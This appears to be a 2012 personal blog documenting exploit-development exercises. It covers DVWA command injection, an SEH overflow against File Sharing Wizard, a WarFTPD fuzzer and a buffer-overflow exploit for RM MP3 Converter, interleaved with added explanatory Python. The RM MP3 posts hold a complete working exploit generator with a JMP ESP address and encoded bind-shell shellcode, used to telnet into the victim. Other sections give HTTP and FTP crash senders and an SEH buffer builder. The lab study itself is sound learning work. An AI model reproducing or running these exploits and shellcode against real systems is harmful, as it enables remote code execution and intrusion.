Saturday, 17 March 2012

exploiting a Linux server through a DVWA vuln

For a long time I couldn't get to my blog because of a damn game, but it was very fun to play. Now I am learning how to exploit a system through a web application vulnerability. My virtual server has DVWA (Damn Vulnerable Web Application) installed, and I will attack it. Now I will try to trigger errors to decide how to attack the system.

This picture is the DVWA screen. Of its many vulnerabilities I will attack the command execution service available on DVWA; I think this one is easy to exploit. On the Linux command line we can run two commands on one line, for example "ls | w": the pipe feeds the output of the first command to the second as its input, so any text that reaches the shell after such a separator is executed as a command of its own.
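DVWA's command execution page wraps a ping around the address typed into the form and hands the whole line to a shell, which is why a separator in the input gets a second command executed. As an added example (not code from the original post and not DVWA's own code), the Python below reproduces that behaviour offline, with echo standing in for ping so it finishes instantly, and shows the fix beside it: validate the input as an IP address and pass it as a separate argv element with no shell. The function names and the sample inputs are constructed for illustration.

```python
import ipaddress
import subprocess

# Added example, not DVWA's code.  echo stands in for the ping that DVWA's
# command execution page runs; the only thing that differs between the two
# functions is how the user's input reaches the operating system.


def ping_vulnerable(host):
    """DVWA style: the input is glued into a shell command string.

    /bin/sh parses the whole line, so a separator in `host` ('|', ';', '&&',
    backticks, $(...)) starts a second command that runs with the web
    server's privileges."""
    cmd = "echo pinging " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def is_valid_host(host):
    """Allow-list check: accept only a literal IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def ping_hardened(host):
    """Validate, then pass the value as one argv element and never start a shell.

    Even if validation were bypassed, argv is not parsed for metacharacters,
    so '127.0.0.1; id' could only ever be one (bad) hostname argument."""
    if not is_valid_host(host):
        raise ValueError("refusing input that is not an IP address: %r" % host)
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed inputs: the page's "ls | w" idea applied to the ping form.
    print(ping_vulnerable("127.0.0.1 | tr a-z A-Z"))    # second command receives the first's output
    print(ping_vulnerable("127.0.0.1; echo INJECTED"))  # second command runs on its own
    print(ping_hardened("127.0.0.1"))
    try:
        ping_hardened("127.0.0.1; echo INJECTED")
    except ValueError as err:
        print("blocked:", err)
```

Run it on any system with /bin/sh: the first call prints "PINGING 127.0.0.1" (the pipe handed echo's output to tr), the second prints "INJECTED" on its own line, and the hardened version refuses the same input before anything runs.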

Thursday, 01 March 2012

SEH (exploitation of File Sharing Wizard)

This time I will try to develop an exploit for a buffer overflow in an application that has SafeSEH / SEH. I will exploit File Sharing Wizard. This time it is not so different, just a development of the exploitation I did before, like the local exploit, but this application has protection against buffer overflow. OK, first, as usual, I will create an exploit program to send the first buffer and to analyse it.
To know how to build the exploit we must sniff with Wireshark, so that the exploit we compose sends the request in the form the application expects. This time I found the application running on port 80, as you can see in the picture.
Now I will write the exploit like the one I wrote before:
#!/usr/bin/python
import socket

target_address = "192.168.4.44"
target_port = 80

# 10000 bytes of 'A' in the request line (URI position) of an HTTP request
junk = b"\x41" * 10000
request = b"GET " + junk + b" HTTP/1.1\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(request)
sock.close()

Now let's see what happens in File Sharing Wizard

The application has crashed :D, OK, I will develop it further
The application has crashed but EIP is not overwritten, because File Sharing Wizard has SEH. To see the SEH chain click the View menu, then SEH chain, as in the picture. The buffer that was sent has landed in the SEH chain.
The way in when the SEH chain is overwritten is the POP POP RETN method: the overwritten handler pointer is made to point at a POP POP RET sequence in a module without SafeSEH, so that when the exception is dispatched, execution returns into the attacker-controlled record (the next-SEH field), which holds a short jump into the payload.
Now I build the buffer again; I will send a string of 10000 characters.
To be continued
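The post stops before the SEH offset and the POP POP RET address are known, so here, as an added example that is not the post's code, is the buffer layout the POP POP RETN method needs, written in Python. The offset (2000), the gadget address (0x1001A3C2) and the int3 placeholder payload are assumptions chosen only to show the layout; a real exploit takes the offset from pattern_offset on the value shown in the SEH chain and the address from a module compiled without SafeSEH. The nSEH field gets a 2-byte short jump over the handler address; the handler field gets the gadget; POP POP RET pops two dwords and returns to the address at ESP+8, which during exception dispatch points at the overwritten record itself, so execution lands on the short jump and from there in the payload.

```python
import struct

# Assumed values for illustration only; the post has not found the real ones.
OFFSET_TO_NSEH = 2000        # distance from the start of the URI to the nSEH field
PPR_ADDRESS = 0x1001A3C2     # address of a POP POP RET in a non-SafeSEH module
BAD_CHARS = b"\x00\x0a\x0d"  # cannot survive inside an HTTP request line

NSEH = b"\xeb\x06\x90\x90"   # JMP SHORT +6: skips the 2 NOPs and the 4-byte handler address


def build_seh_buffer(offset_to_nseh, ppr_address, payload, total_length):
    """[junk][nSEH: jmp short +6][SEH: POP POP RET][payload][filler]"""
    handler = struct.pack("<I", ppr_address)           # little-endian, as it sits in memory
    bad = [b for b in handler if b in BAD_CHARS]
    if bad:
        raise ValueError("gadget address contains bad bytes: %r" % bad)
    buf = b"A" * offset_to_nseh + NSEH + handler + payload
    if len(buf) > total_length:
        raise ValueError("layout is %d bytes but only %d fit" % (len(buf), total_length))
    return buf + b"C" * (total_length - len(buf))     # keep the total size that caused the crash


def seh_record(buf, offset_to_nseh):
    """What the exception dispatcher sees: (nSEH bytes, handler address, payload offset)."""
    nseh = buf[offset_to_nseh:offset_to_nseh + 4]
    handler = struct.unpack("<I", buf[offset_to_nseh + 4:offset_to_nseh + 8])[0]
    return nseh, handler, offset_to_nseh + 8


def http_request(buf):
    """Wrap the buffer the way the post's script does: in the request line of an HTTP request."""
    return b"GET " + buf + b" HTTP/1.1\r\n\r\n"


if __name__ == "__main__":
    payload = b"\xcc" * 16                       # int3 placeholder; a real payload goes here
    buf = build_seh_buffer(OFFSET_TO_NSEH, PPR_ADDRESS, payload, 10000)
    nseh, handler, at = seh_record(buf, OFFSET_TO_NSEH)
    print("nSEH=%r handler=0x%08x payload at +%d" % (nseh, handler, at))
    print(http_request(buf)[:40])
```

The bad-byte check matters more for SEH than for a plain EIP overwrite: the handler address travels inside an HTTP request line, so a gadget whose address contains 0x00, 0x0a or 0x0d would be cut off before it reached the stack.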

Sunday, 12 February 2012

local exploit: RM MP3 Converter

Now I try the buffer overflow in RM MP3 again. In this step, to check the overflow, I use three scripts to build the buffer: the first makes a string of 10000 characters, the second 20000, the third 30000. I will try them one by one to learn how many characters I need to overflow RM MP3.
For this job I use:
OllyDBG
Mini Stream RM MP3 Converter
an exploit written by myself
the file that overflows the buffer, made by myself
OK, let's begin the overflow attempts. Start with 10000 characters: no overflow :'(. Second try, 20000 characters: yup, overflow. Try again with 30000 characters: yup, overflow again, boom boom overflow.

Now I search how many bytes it takes to overwrite EIP. I create a 20000-character pattern to learn how many bytes are needed to reach EIP and ESP. Yup, got it, boom, crash again :D. Now we take EIP and ESP. EIP:
root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb 0x36695735 20000
17417
ESP:
root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb i8W 20000
17425
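pattern_create.rb and pattern_offset.rb are Metasploit's tools. The Python below is an added example (not the post's code and not Metasploit's) that reimplements the same cyclic pattern so the two numbers above can be checked offline: the EIP value 0x36695735 is unpacked little-endian to the four characters "5Wi6", which sit at offset 17417 of the pattern, and "i8W" (the start of what ESP points at) is at 17425. The same two offsets are reused in the "buffer overflow RM MP3" post further down the page. The last function derives, from those two numbers, where ESP lands relative to the return address, which is what decides how long the NOP sled after the return address must be.

```python
import string
import struct

# Metasploit's cyclic pattern: Aa0Aa1...Aa9Ab0...  Every 3-byte group is
# unique, so any 3 or 4 bytes read from a register map to exactly one offset.
FULL_PATTERN = "".join(u + l + d
                       for u in string.ascii_uppercase
                       for l in string.ascii_lowercase
                       for d in string.digits)          # 26*26*10*3 = 20280 bytes


def pattern_create(length):
    """Same output as pattern_create.rb for lengths up to 20280."""
    if length > len(FULL_PATTERN):
        raise ValueError("pattern repeats after %d bytes" % len(FULL_PATTERN))
    return FULL_PATTERN[:length]


def pattern_offset(value, length=20000):
    """Offset of `value` in the pattern, or None.

    `value` is an int read from a register (unpacked little-endian, the way
    pattern_offset.rb treats 0x36695735) or the characters seen in memory."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("ascii")
    else:
        needle = value
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def esp_sled_index(eip_offset, esp_offset):
    """How many bytes past the 4-byte return address ESP points.

    The return address occupies eip_offset..eip_offset+3, so a NOP sled placed
    right after it must be longer than this number for JMP ESP to land in it."""
    return esp_offset - (eip_offset + 4)


def crash_file_contents(length=20000):
    """The m3u line with the pattern in place of the 'A's (the post's "http://" prefix kept)."""
    return b"http://" + pattern_create(length).encode("ascii")


if __name__ == "__main__":
    eip = pattern_offset(0x36695735)     # value read from EIP in OllyDBG
    esp = pattern_offset("i8W")          # characters ESP pointed at
    print("EIP offset:", eip, "ESP offset:", esp)
    print("ESP is %d bytes into the sled" % esp_sled_index(eip, esp))
    with open("pattern.m3u", "wb") as f:
        f.write(crash_file_contents())
```

With the page's numbers ESP lands 4 bytes past the return address, so the 32-byte NOP sled the final exploit places after the JMP ESP address comfortably covers it.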
OK, next I write the program again to find JMP ESP.
I will put the characters DADADADA into EIP.
Yup, created.
#!/usr/bin/python
file = "eip.m3u"
junk = b"http://" + b"\x90" * 17417   # padding up to the saved return address (pattern offset 17417)
junk += b"\xDA\xDA\xDA\xDA"           # should show up in EIP as DADADADA
file = open(file, 'wb')                # binary mode so the bytes are written untouched
file.write(junk)
print("success idiot")
file.close()

Now I check what is at ESP: gotcha, ESP holds CACACACACA :D
Now I look for a JMP ESP, in shell32: yup, got it, JMP ESP at 7C9D30D7:
After checking, bingo, the JMP ESP works, so now I will build the exploit.
I use the payload from my earlier exploitation.
#!/usr/bin/python
file = "exploit.m3u"
junk = b"http://" + b"\x90" * 17417   # padding up to the saved return address (pattern offset 17417)
junk += b"\xD7\x30\x9D\x7C"           # 0x7C9D30D7, JMP ESP in shell32.dll, little-endian
junk += b"\x90" * 32                  # NOP sled; ESP was at offset 17425, 4 bytes past EIP, so it lands inside the sled
# encoded payload reused from the earlier exploit (a bind shell: the post telnets to the victim afterwards)
junk += (b"\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
b"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
b"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
b"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
b"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
b"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
b"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
b"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
b"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
b"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
b"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
b"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
b"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
b"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
b"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
b"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
b"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
b"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
b"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
b"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
b"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
b"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file = open(file, 'wb')                # binary mode so the bytes are written untouched
file.write(junk)
print("success idiot")
file.close()
Bingo, crash, crash, crash. Now I try to telnet to the victim:
Gotcha, let's dance dance dance hahaa, done done done, under attack.
Success...


buffer overflow RM MP3

Now I learn buffer overflow again; this time I overflow RM MP3. To build the buffer I make a file with a Perl script:

#!/usr/bin/perl
use strict;
use warnings;

my $file = "crash2.m3u";
my $junk = "\x41" x 30000;   # change this count to find how many characters are needed to overflow
open(my $FILE, ">", $file) or die "cannot open $file: $!";
print $FILE $junk;
close($FILE);
print "m3u File Created successfully\n";

Now I run this script to make the file crash2.m3u; the next step is to open the crash file in MP3 Converter.
When I open it in RM MP3 nothing crashes. I have failed, but no problem, I try making the file with another script that I adapted from the exploit-db script:

#!/usr/bin/perl
use strict;
use warnings;

my $Header = "#EXTM3U\n";
my $ex = "http://" . "A" x 26121;

# '>' truncates; the exploit-db original used '>>', which appends, so running it twice doubles the file
open(my $MYFILE, ">", "asu.m3u") or die "cannot open asu.m3u: $!";
print $MYFILE $Header . $ex;
close($MYFILE);

Then I run this Perl script and open the file in RM MP3 and tara tara, boom, crash. I don't know what happened with my earlier script, and I must find out. RM MP3 overflows at 20000 and 30000.
Now I replace the character A with the string I generate with pattern_create.
Now I try again and see what happens next
I feel something is wrong there, but I will try again, so keep moving on.
Now, to create the exploit, I must know where things land:
to reach EIP takes 17417 bytes of data, and to reach the stack 17425.
Now I will write DADADADA into EIP,
so I write this code:

#!/usr/bin/perl
use strict;
use warnings;

my $Header = "#EXTM3U\n";
my $ex  = "http://" . "\x90" x 17417;   # padding up to the saved return address
my $ex1 = "\xDA\xDA\xDA\xDA";            # lands in EIP
open(my $MYFILE, ">", "b.m3u") or die "cannot open b.m3u: $!";
print $MYFILE $Header . $ex . $ex1;
close($MYFILE);
Yeaaa, EIP is overwritten with DADADADA, so I control EIP.
But I don't know how to compute lengths in Perl, haha, so I skip that step; to check that EIP is really mine I write the JMP ESP address into the EIP position.
Now I write the code again to build the exploit on Windows. Oh no, I did something wrong, my payload can't work: I have a problem with the payload again

#!/usr/bin/python
file = "fuck3.m3u"
junk = b"http://" + b"\x90" * 17417   # padding up to the saved return address (pattern offset 17417)
junk += b"x\D7\x30\x9D\x7C"           # BUG kept as on the page: "x\D7" is not the escape "\xD7", so EIP gets the wrong bytes and the payload can't work
junk += b"\x90" * 32                  # NOP sled before the payload
junk += (b"\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
b"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
b"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
b"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
b"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
b"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
b"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
b"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
b"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
b"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
b"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
b"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
b"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
b"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
b"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
b"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
b"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
b"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
b"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
b"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
b"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
b"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file = open(file, 'wb')                # binary mode so the bytes are written untouched
file.write(junk)
print("success")
file.close()

Friday, 10 February 2012

download

http://www.mediafire.com/?w77a06erasgs6nl

exploit development > warftpd

In this next step I learn about buffer overflow; here I try to exploit Windows XP SP3 through a buffer overflow vulnerability. To learn this method I need the WarFTPD application, Metasploit and OllyDBG; to find the vuln I need a fuzzer, and I use the fuzzer written by mrp.bpp, who is my guru:

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"\x41" * 1000                    # 1000 'A's as the USER argument
s.connect(('192.168.9.239', 21))           # target IP
data = s.recv(1024)                        # banner
print("sending evil data via USER command..")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD \r\n')
s.close()
print("Finish")
This program is set to the victim IP 192.168.9.239; now I try to run it...
No, I have failed: my WarFTPD won't run when I start it under OllyDBG. I hope I can solve this problem.
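The fuzzer above sends one fixed 1000-byte USER argument, so it only tells you whether that one length crashes the server; the three hand-made 10000/20000/30000 files in the RM MP3 posts are the same idea done by hand. As an added example (not the post's code and not mrp.bpp's), the Python below sends USER arguments of growing length until the server stops answering, and includes a constructed fake FTP server that drops the connection above a chosen length so the whole thing runs offline; the threshold (480), the step sizes and the function names are assumptions. Against a real WarFTPD the same loop applies, with the server restarted under OllyDBG after each crash; "no reply" is the crash signal used here, and a refused connection on the next attempt is the other common one.

```python
import socket
import threading


def fake_ftp_server(crash_above=480):
    """Constructed stand-in for WarFTPD so the fuzzer can run offline.

    Greets with a 220 banner, reads one command line and, if it is a USER
    command whose argument is longer than `crash_above` bytes, closes the
    connection without replying (what a crashed server looks like from the
    client side).  Returns (listening socket, port); close the socket to stop."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))                 # port 0: let the OS pick a free one
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:                    # listening socket was closed
                return
            with conn:
                conn.sendall(b"220 fake WarFTPD ready\r\n")
                line = b""
                while not line.endswith(b"\r\n"):
                    chunk = conn.recv(65536)
                    if not chunk:
                        break
                    line += chunk
                if line.startswith(b"USER ") and len(line) - len(b"USER \r\n") > crash_above:
                    continue                   # "crash": drop the client without a reply
                conn.sendall(b"331 User name okay, need password\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def fuzz_user(host, port, start=100, step=100, limit=2000, timeout=2.0):
    """Send USER with an argument of `start`, `start+step`, ... bytes.

    Returns the first length for which the server gives no reply (closed
    connection or timeout), or None if every length up to `limit` is answered."""
    for length in range(start, limit + 1, step):
        s = socket.create_connection((host, port), timeout=timeout)
        try:
            s.recv(1024)                                   # banner
            s.sendall(b"USER " + b"A" * length + b"\r\n")
            reply = s.recv(1024)                           # b"" means the server hung up
        except (socket.timeout, ConnectionError):
            reply = b""
        finally:
            s.close()
        if not reply:
            return length
    return None


if __name__ == "__main__":
    srv, port = fake_ftp_server(crash_above=480)
    print("first crashing USER length:", fuzz_user("127.0.0.1", port))
    srv.close()
```

Once the first crashing length is known, the next step is the same as in the RM MP3 posts: send a cyclic pattern of that length instead of 'A's and read the EIP and ESP values in OllyDBG.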

Thursday, 09 February 2012

buffer overflow

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.

While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or buffer overflow, since the extra two bytes of data will overflow and spill out of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The overflow_example.c code offers an example.


int main(int argc, char *argv[]) {
   int value = 5;
   char buffer_one[8], buffer_two[8]; 
 
reference:art of exploitation 2nd edition 
